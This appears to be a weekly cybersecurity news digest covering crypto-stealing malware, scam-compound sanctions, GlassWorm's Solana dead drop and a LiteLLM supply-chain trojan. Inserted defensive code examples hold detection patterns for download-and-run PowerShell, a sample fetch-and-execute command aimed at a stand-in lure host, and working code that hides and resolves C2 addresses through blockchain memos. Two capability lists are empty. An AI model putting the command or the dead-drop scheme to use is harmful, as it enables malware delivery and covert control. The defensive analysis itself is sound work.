
India arrests trafficker, Solana used as a dead drop, and other cybersecurity developments

We have gathered the week’s most important cybersecurity news.

  • Over 700 browser-based crypto wallets were targeted by an info-stealer.
  • The UK imposed sanctions on Xinbi and scam compounds in Southeast Asia.
  • Malware used Solana to steal crypto data and conduct phishing.
  • A cyberattack on an ignition interlock maker limited access to vehicles.

Over 700 browser-based crypto wallets targeted by an info-stealer

The new Torg Grabber info-stealer targets sensitive data held by 850 browser extensions, including crypto wallets, password managers, note-taking apps and two-factor authentication tools, cybersecurity researchers at Gen Digital report.

Initial access uses the ClickFix technique: a lure page places a malicious PowerShell one-liner on the victim's clipboard and walks them through pasting and running it themselves, so the infection starts from an action the user takes rather than from a software exploit.
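Because the victim runs the command by hand, the best forensic trace is often the Windows Run dialog history (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where each entry is stored with a trailing "\1". The following is an added example, not code from Gen Digital or from the page, that triages such entries offline: it strips the suffix, decodes any -EncodedCommand payload (base64 of UTF-16LE) and flags the indicators that typical ClickFix one-liners carry. The indicator patterns, the hostnames and the sample RunMRU values are all constructed for the example.

```python
import base64
import re

# Indicators typical of pasted ClickFix one-liners: hidden window, encoded or
# remotely fetched payload, and the "verification" comment the lure appends so
# the line looks legitimate to the victim. These patterns are assumptions, not
# a reproduction of Gen Digital's detection logic.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
        r"|\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\b(?:iex|invoke-expression)\b",
        re.I),
    "mshta_or_curl": re.compile(r"\b(?:mshta|curl|certutil)\b.*https?://", re.I),
    "captcha_lure": re.compile(r"#.*\b(?:not a robot|verif|captcha|cloudflare)", re.I),
}
LAUNCHER = re.compile(r"\b(?:powershell|pwsh|mshta|cmd)\b", re.I)
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def strip_runmru(value: str) -> str:
    """RunMRU stores each command with a trailing '\\1'; drop it."""
    return value[:-2] if value.endswith("\\1") else value


def decode_encoded_command(cmd: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE; return the plaintext or None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmd: str) -> list:
    """Indicator names that fire on the command (and on its decoded payload, if any)."""
    if not LAUNCHER.search(cmd):
        return []
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded:
        text = cmd + " " + decoded  # judge the real payload, not just the wrapper
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage(runmru_values) -> list:
    """Return [(command, indicators)] for the suspicious entries, in the given order."""
    out = []
    for value in runmru_values:
        cmd = strip_runmru(value)
        hits = score(cmd)
        if hits:
            out.append((cmd, hits))
    return out


# Constructed sample of RunMRU values (hand-written, not from the report).
SAMPLE_RUNMRU = [
    r"notepad\1",
    r'powershell -w hidden -c "iex (irm https://lure.example.invalid/verify)" '
    r"# I am not a robot - reCAPTCHA Verification ID: 7811\1",
    r"mshta https://lure.example.invalid/check.hta\1",
    r"cmd /c echo hello\1",
    r"powershell -enc SQBFAFgAIAAoAEkAUgBNACAAaAB0AHQAcABzADoALwAvAGwAdQByAGUA\1",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(hits, cmd)
```

The same scoring works on process-creation telemetry (for example the command line of powershell.exe spawned by explorer.exe); RunMRU is simply the artefact that survives on a host with no EDR. Decoding the encoded form matters because a -enc blob alone only tells you something was hidden, while the decoded text shows the download-and-execute chain.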

The list of targeted extensions includes 728 crypto wallets such as MetaMask, Phantom and Trust Wallet.

Source: Gen Digital.

Torg Grabber also harvests data from Discord, Telegram, Steam, VPN tools, email services and desktop versions of crypto apps.

Beyond these features, the malware can:

Since late 2025 the operators have moved command-and-control traffic to HTTPS behind Cloudflare's infrastructure, which makes the servers harder to identify and block. The stealer has also gained the ability to bypass the cookie protections in Chrome, Brave, Edge, Vivaldi and Opera.

According to researchers, 334 samples were compiled between December 2025 and February 2026, with new command-and-control servers registered weekly.

UK sanctions Xinbi and scam compounds in Southeast Asia

On 26 March, the UK government imposed sanctions on the crypto marketplace Xinbi and individuals linked to scam compounds in Southeast Asia.

Officials said the platform facilitates the sale of stolen personal data and supplies tooling used to target victims, including satellite internet equipment. The measures cut the network off from financial channels.

The sanctions also hit Legend Innovation, operator of #8Park — a large scam compound in Cambodia. Preliminary estimates suggest up to 20,000 forced labourers are held there. The firm’s director, Eang Soklim, and individuals tied to the Prince Group financial network were designated.

According to Chainalysis, more than $19.9bn in transactions flowed through Xinbi between 2021 and 2025.

In India, law enforcement arrested Sunil Nellatt Ramakrishnan, also known as Krish, on suspicion of trafficking people to crypto scam centres in Myanmar.

Authorities say he was a key player in transporting victims from Delhi to Bangkok under the pretext of legal employment in Thailand. People were forcibly moved to the Myawaddy area, including the KK Park complex.

Searches at the suspect’s residence linked him to human-trafficking operations in Cambodia.

Malware used Solana to steal crypto data and phish

Cybersecurity firm Aikido observed a new phase of the GlassWorm campaign. The attackers distribute malicious code packages that steal developer data and install a remote access trojan.

GlassWorm gains access via malicious packages published to developer repositories including npm, PyPI, GitHub and the Open VSX marketplace.

Its operators also compromise maintainers’ accounts on popular projects to push poisoned updates.

Rather than hard-coding the command-and-control server address in the malware, where it is easy to find and block, the attackers used a "dead drop" method and hid it on the Solana blockchain.

The loader connects to the Solana network, reads the transaction history of a set of preselected wallets and looks for transactions carrying a memo field. Once it finds one, it extracts the obfuscated link, decodes it and connects to the remote server. Because the lookup goes to public blockchain endpoints, the operators can move the server simply by posting a new memo, and the traffic looks like an ordinary RPC query. The malware does not infect systems with a Russian locale.

Decoding the Solana memo field into the hackers’ remote server link. Source: Aikido.
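The resolution logic described above, modelled as an added example; this is neither Aikido's code nor the malware's. It does not talk to Solana: the transaction records are a simplified, hand-written stand-in for a wallet's history, the wallet ids and URLs are placeholders, and the obfuscation (XOR with a short key, then base64) is an assumption standing in for whatever GlassWorm actually uses. The Google Calendar variant mentioned further down differs only in where the encoded string is read from, so the decode and validation steps are the same.

```python
import base64
from urllib.parse import urlparse

# Solana Memo program (v2) id; memo instructions reference this program.
MEMO_PROGRAM_V2 = "MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, symmetric: the same call hides and reveals the URL."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_drop(url: str, key: bytes) -> str:
    """How an operator would prepare the memo text (assumed scheme: XOR, then base64)."""
    return base64.b64encode(xor_bytes(url.encode("ascii"), key)).decode("ascii")


def decode_drop(memo: str, key: bytes):
    """Return the https URL hidden in a memo, or None if the memo is not a drop."""
    try:
        raw = base64.b64decode(memo, validate=True)  # rejects plain-text memos
        text = xor_bytes(raw, key).decode("ascii")   # rejects other people's base64
        parts = urlparse(text)
    except (ValueError, UnicodeDecodeError):         # binascii.Error is a ValueError
        return None
    return text if parts.scheme == "https" and parts.netloc else None


def memos_for_wallet(transactions, wallet):
    """Memo payloads on transactions that involve `wallet`, newest slot first."""
    for tx in sorted(transactions, key=lambda t: t["slot"], reverse=True):
        if wallet not in tx["accounts"]:
            continue
        for ins in tx["instructions"]:
            if ins["program"] == MEMO_PROGRAM_V2:
                yield tx["slot"], ins["data"]


def resolve_c2(transactions, wallets, key):
    """Loader logic: the newest memo across the watched wallets that yields a URL.

    Unrelated memos are skipped rather than treated as errors, so a noisy
    wallet (anyone can send a memo to it) does not break resolution.
    """
    best = None
    for wallet in wallets:
        for slot, memo in memos_for_wallet(transactions, wallet):
            url = decode_drop(memo, key)
            if url and (best is None or slot > best[0]):
                best = (slot, url)
    return best[1] if best else None


# Constructed sample history; wallet ids and URLs are placeholders, not real ones.
KEY = b"\x5a\xa5"
WATCHED = ["DropWa11et1111111111111111111111111111111111"]
TRANSACTIONS = [
    {"slot": 100, "accounts": WATCHED + ["Sender1"], "instructions": [
        {"program": MEMO_PROGRAM_V2, "data": "thanks for the coffee"}]},   # plain memo
    {"slot": 200, "accounts": WATCHED + ["Sender2"], "instructions": [
        {"program": MEMO_PROGRAM_V2, "data": "aGVsbG8="}]},               # base64, no URL
    {"slot": 300, "accounts": WATCHED + ["Sender3"], "instructions": [
        {"program": MEMO_PROGRAM_V2,
         "data": encode_drop("https://c2.example.invalid/stage2", KEY)}]},  # the drop
    {"slot": 400, "accounts": ["OtherWallet", "Sender4"], "instructions": [
        {"program": MEMO_PROGRAM_V2,
         "data": encode_drop("https://decoy.example.invalid/", KEY)}]},    # wallet not watched
]

if __name__ == "__main__":
    print(resolve_c2(TRANSACTIONS, WATCHED, KEY))
```

For a defender the useful inversion is the same code run over a suspect wallet's real history with the key recovered from the loader: every memo that decodes to a URL is a past or present C2 address. On developer machines, outbound requests to public Solana RPC hosts from a build tool or editor extension are themselves a signal worth alerting on, since the dead drop only works if the loader can reach the chain.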

The second stage of the attack has two components.

The first detects USB devices: when the user connects a hardware wallet, a phishing window appears.

The second component is a JavaScript RAT. Its download address is extracted from a Google Calendar event description (another “dead drop” method).

Its tasks include launching a covert remote desktop module, stealing browser data and executing arbitrary JavaScript.

In addition, the trojan force-installs the Google Docs Offline extension. It collects a tree of active tabs, up to 5,000 history entries, screenshots and clipboard contents. The extension also monitors crypto exchanges such as Bybit, capturing authorisation tokens and device IDs.

Cyberattack on an ignition interlock maker limited access to vehicles

Hackers attacked Intoxalock, a US supplier of vehicle ignition interlock systems. The disruption to its devices left some owners unable to start their cars, the Russian outlet "Хакер" (Xakep) reported.

Intoxalock makes devices that offenders convicted of drink-driving are required to install. To start the engine, a driver must blow into a tube to verify that blood alcohol content is below the legal limit; otherwise the car will not start. In some states the system also records GPS coordinates and routinely photographs the person at the wheel.

Source: Intoxalock.

According to media reports, the device must be recalibrated at a service centre roughly once a month. Because of the cyberattack, calibration was impossible, and drivers whose calibration window had expired were locked out of their vehicles. In Connecticut alone, the issue affected 7–10% of users.

The company extended service-centre authorisations by 10 days, though the grace period did not apply to all device versions or all states.

The system was restored on 22 March. Intoxalock’s management pledged to reimburse users’ expenses, including vehicle towing.

Researcher found a trojan in the LiteLLM AI app

Credential-stealing malware was discovered in the popular LiteLLM AI library, reported Callum McMahon of FutureSearch.

LiteLLM gives developers a single interface to hundreds of different LLM providers and tracks spend across them. The project has over 40,000 GitHub stars and thousands of forks, and daily downloads reach 3.4 million.

According to McMahon, the malware entered via a third-party package on which LiteLLM depends. He suspected an infection when his computer suddenly shut down right after installing the software: a bug in the malware itself caused the crash, which is what revealed the presence of the attacker's code.
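A dependency-borne compromise of this kind is exactly what hash-pinned installs are meant to stop: the lockfile records the sha256 of every artefact, and an upload that replaces a package with a tampered one no longer matches. The following is an added example, not LiteLLM's tooling, that parses pip's --require-hashes lockfile format and verifies a local artefact against it. The package name, the wheel contents and the lockfile are constructed inside the code so it runs offline.

```python
import hashlib
import re
import tempfile
from pathlib import Path

HASH_OPT = re.compile(r"--hash=sha256:([0-9a-f]{64})$")


def _normalize(name: str) -> str:
    """Package names compare case-insensitively, with '_' and '-' equivalent."""
    return name.lower().replace("_", "-")


def parse_pinned_requirements(text: str) -> dict:
    """Parse the pip --require-hashes format into {(name, version): {sha256, ...}}.

    Every requirement must be pinned with == and carry at least one hash;
    anything else is rejected, which mirrors pip's behaviour in that mode.
    """
    pins = {}
    for line in text.replace("\\\n", " ").splitlines():  # join continuation lines
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        spec, *opts = line.split()
        if "==" not in spec:
            raise ValueError(f"unpinned requirement: {spec}")
        digests = set()
        for opt in opts:
            m = HASH_OPT.match(opt)
            if not m:
                raise ValueError(f"unexpected option {opt!r} for {spec}")
            digests.add(m.group(1))
        if not digests:
            raise ValueError(f"no hash for {spec}")
        name, version = spec.split("==", 1)
        pins[(_normalize(name), version)] = digests
    return pins


def lockfile_is_strict(text: str) -> bool:
    """True if every line is a hash-pinned requirement (the only acceptable state)."""
    try:
        parse_pinned_requirements(text)
        return True
    except ValueError:
        return False


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(pins: dict, name: str, version: str, path: Path) -> bool:
    """True only if the file's digest is one the lockfile allows for this exact pin."""
    allowed = pins.get((_normalize(name), version))
    return allowed is not None and sha256_of(path) in allowed


def demo() -> tuple:
    """Constructed wheel and lockfile; checks a clean copy, a tampered copy, a wrong version."""
    with tempfile.TemporaryDirectory() as tmp:
        good = Path(tmp) / "example_dep-1.0.0-py3-none-any.whl"   # placeholder package
        good.write_bytes(b"constructed wheel contents")
        tampered = Path(tmp) / "tampered.whl"
        tampered.write_bytes(b"constructed wheel contents + injected loader")
        lock = f"example-dep==1.0.0 \\\n    --hash=sha256:{sha256_of(good)}\n"
        pins = parse_pinned_requirements(lock)
        return (verify_artifact(pins, "example_dep", "1.0.0", good),
                verify_artifact(pins, "example-dep", "1.0.0", tampered),
                verify_artifact(pins, "example-dep", "1.0.1", good))


if __name__ == "__main__":
    print(demo())
```

pip performs this check itself when the lockfile has hashes and the install runs with --require-hashes; the point of spelling it out is that the protection is only as good as the pin, so a lockfile with a single unpinned or hash-less line is treated as a failure rather than as partially protected. Hashes do not help against a maintainer publishing a poisoned version that you then deliberately upgrade to, which is the other vector described in the GlassWorm section.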

McMahon and noted developer Andrej Karpathy reached a shared conclusion: the malware was created through "vibe coding" without careful review.

How the malware worked:

TechCrunch noted that LiteLLM's website displays badges for the major security certifications SOC 2 and ISO 27001, issued after an audit by Delve. Delve bills itself as an AI-based service that automates cybersecurity compliance.

According to media reports, Delve had previously been accused of generating fake report data, using questionable auditors and misleading clients about their security posture.

LiteLLM’s developers mitigated the threat within hours of the tainted release appearing. The company has begun an investigation with Mandiant.

What to read this weekend?

In a new ForkLog feature, we explain how Russia’s authorities plan to monitor every crypto transaction inside the country and why bitcoin wallet keys may have to be shared with a digital depository.
